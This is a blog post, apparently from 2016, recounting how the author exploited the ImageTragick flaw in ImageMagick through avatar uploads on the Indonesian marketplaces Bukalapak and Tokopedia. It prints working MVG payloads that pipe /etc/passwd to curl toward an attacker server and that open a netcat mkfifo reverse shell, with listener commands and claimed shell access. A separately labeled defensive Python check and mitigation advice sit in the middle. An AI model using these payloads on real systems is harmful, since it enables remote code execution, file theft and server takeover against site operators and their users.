How I Hacked Bukalapak and Tokopedia using Imagetragick

Published at 12 Jun 2016


After I created a CTF challenge about ImageTragick for Botani CTF, I was curious whether any web apps were still vulnerable to this bug, so I started testing well-known startups in Indonesia, namely Bukalapak and Tokopedia. Both are C2C marketplaces in Indonesia where anyone can open an online store to serve prospective buyers from all over the country.

The ImageTragick bug was discovered 3 months ago by Nikolay Ermishkin. It affects ImageMagick version 6.9.3 or lower. Basically, if the input file supplies a URL string, ImageMagick will try to retrieve that file (in this case an image) before the conversion process, much like an SSRF bug, except that the URL parameter is not filtered properly, so it can be escaped to gain remote code execution. Here is an example:

$ convert '";|ls "-la' tmp.png
total 32
drwxr-xr-x 6 hrdn hrdn 204 Jun 11 21:01 .
drwxr-xr-x 232 hrdn hrdn 7888 Jun 11 11:37 ..

While testing for the ImageTragick bug I came across a file upload feature, and I wanted to try uploading an MVG file containing my payload. Both startups provide a file upload feature on the profile page where a user can upload an avatar.

Steps to reproduce

Create a file avatar.jpg; we use the MVG format, which ImageMagick recognizes by content regardless of the .jpg extension.

push graphic-context
viewbox 0 0 640 480
fill 'url(";| [RCE HERE] | touch "hello)'
pop graphic-context

We can execute a command and send its output to our server using curl:

push graphic-context
viewbox 0 0 640 480
fill 'url(";| cat /etc/passwd | curl -d @- [ip:port] | touch "hello'
pop graphic-context

First, we need to create a listener using netcat on our server.

$ nc -lvp 9700
Listening on [] (family 0, port 9700)

Then visit the profile page and upload the payload avatar.jpg.

profile page

Voila! We got a response from the Bukalapak server.
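As an added, defender-side example that is not part of the original post: the root cause above is that ImageMagick chooses the decoder from file content, so an avatar.jpg that really holds MVG text still reaches the vulnerable coder. This Python check (hypothetical helper names, constructed sample inputs) validates an upload by magic bytes and flags the MVG markers used in this post before anything is handed to convert.

```python
import re
from typing import Optional, Tuple

# Magic bytes of the raster formats an avatar endpoint should accept.
RASTER_MAGIC = {
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",  # covers both GIF87a and GIF89a
}

# Textual markers of an MVG payload as used in this post: an MVG graphic
# context, and a url(...) whose quoted URL is broken out of with | or ;.
MVG_MARKERS = (
    re.compile(rb"^\s*push graphic-context", re.M),
    re.compile(rb"url\([^)]*\"[^\"]*[|;]"),
)

# Constructed samples: a minimal JPEG header and the MVG shape from this post.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLE_MVG = (b"push graphic-context\nviewbox 0 0 640 480\n"
              b"fill 'url(\";| [RCE HERE] | touch \"hello)'\npop graphic-context\n")


def detect_raster(data: bytes) -> Optional[str]:
    """Return the raster format name if data starts with a known magic, else None."""
    for name, magic in RASTER_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def looks_like_mvg_payload(data: bytes) -> bool:
    """True if the upload head carries the MVG/ImageTragick markers above."""
    head = data[:4096]  # these payloads are tiny; the head is enough
    return any(p.search(head) for p in MVG_MARKERS)


def check_avatar_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide by content, never by extension, whether ImageMagick may see this file."""
    if looks_like_mvg_payload(data):
        return False, f"rejected {filename}: MVG/ImageTragick markers in content"
    fmt = detect_raster(data)
    if fmt is None:
        return False, f"rejected {filename}: not JPEG/PNG/GIF by magic bytes"
    return True, f"accepted {filename} as {fmt}"


if __name__ == "__main__":
    for name, blob in (("avatar.jpg", SAMPLE_MVG), ("real.jpg", SAMPLE_JPEG)):
        print(check_avatar_upload(name, blob))
```

Content validation is only one layer: the actual fix is upgrading ImageMagick and disabling the affected coders (EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, PLT) in policy.xml.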


Gaining reverse shell

We can use one of the reverse shell payloads provided by pentest-monkey; I personally use the netcat reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f

This time we will try to execute the payload on Tokopedia. Just like Bukalapak, Tokopedia is also vulnerable in the avatar upload feature. Create the payload file, avatar.jpg:

push graphic-context
viewbox 0 0 640 480
fill 'url(";| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [your ip] [your port] >/tmp/f | touch "hello'
pop graphic-context

Then create a listener as above; the port number doesn't matter as long as it doesn't collide with another program and isn't below 1024 (reserved port numbers).

$ nc -lvp 31337
Listening on [] (family 0, port 31337)

Visit the profile page and upload the payload.

profile page

We got a reverse shell.


read /etc/passwd